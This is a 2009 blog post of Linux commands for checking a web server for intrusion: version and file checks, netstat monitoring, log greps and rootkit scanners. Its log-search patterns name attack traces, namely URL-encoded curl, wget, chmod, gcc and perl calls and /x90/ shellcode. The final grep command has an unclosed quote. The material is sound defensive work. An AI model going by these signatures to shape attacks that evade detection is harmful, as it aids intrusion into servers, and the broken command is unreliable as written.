December 19, 2009

Other commands on Version, Virus scan etc

What version of Linux is running

root:~#cat /etc/redhat-release

or for non Red-Hat Linux

root:~#cat /etc/issue


Comapre this to the kernel

root:~#uname -a

and

root:~#cat /proc/version

Who is the author of the file:

root:~#ls –la --author


When was the last time the file has been accessed and by who:

root:~#ls -l --time=access

Before you run off and use the cat command it is good to first check the file type with the file command. Many a time I myself have been fooled seeing a file marked as something.html and finding it was really a binary file.


What kind of file is it:

root:~#file filename

or

root:~#file /path/to/directory/*


Real Time Network Activity Examples:

root:~#watch -d "netstat -nalp |grep -v DGRAM |grep -v STREAM |grep -v LISTEN"
root:~#watch "netstat -nalp"|grep ":TCP PORT Number"
root:~#watch "netstat -nalp"|grep ":22"

Update the Locate Database:

root:~#updatedb &

Search for Apache Exploit

for i in `locate access_log` ; do echo $i ; egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' $i ; done

or

egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /path/to/log/files/*


cPanel
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*


Ensim
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20'/home/virtual/site*/fst/var/log/httpd/*


Plesk
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/httpd/vhosts/*/statistics/logs/*
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /var/log/httpd/*

Of course not every thing that it locates is an exploit, it takes some interpreting. You are looking for obvious things such as a call to wget to download a file, or a call to perl that looks strangely out of place. However one thing this script does not search for is a call to shell code. Once you locate the access logs run a second search for long strings containing /x90/. I have yet to find a good interpreter of what these shell codes do but again google.com is your friend. Most often you can do a search for the code itself and come up with a technical explanation of what the code does.


Search for Shell Code:
cat /path/to/access/logs/* |grep "/x90/"

Finally now you can run your favorite virus scan and root kit hunter. Some favorites include rkhunter and chkrootkit.


ChkRootkit
http://www.chkrootkit.org


RKHunter
http://www.rootkit.nl

Hopefully by now the updatedb has finished, you can check the status of that by usingthe jobs command. Look for things that are out of place and dont belong, are there .bash_history or access_log files that seem to be in the wrong area. This is where you try to think like a hacker and try to find the strange things that just don’t seem right.


Think Like a Hacker in Your Search

root:~#locate .bash_history
root:~#locate access_log
root:~#locate "..."
root:~#locate ".. "
root:~#locate " .."
root:~#locate ". "
root:~#locate " ."

Who Ownes the IP Address

root:~#whois 12.34.56.78

Gather all Data About the IP Address

root:~#for i in `ls /var/log -la |grep -v drwx |grep -v lrwx | awk '{print $9}'`; do echo /var/log/$i; cat /var/log/$i |grep "12.34.56.78 ; done

No comments:

Post a Comment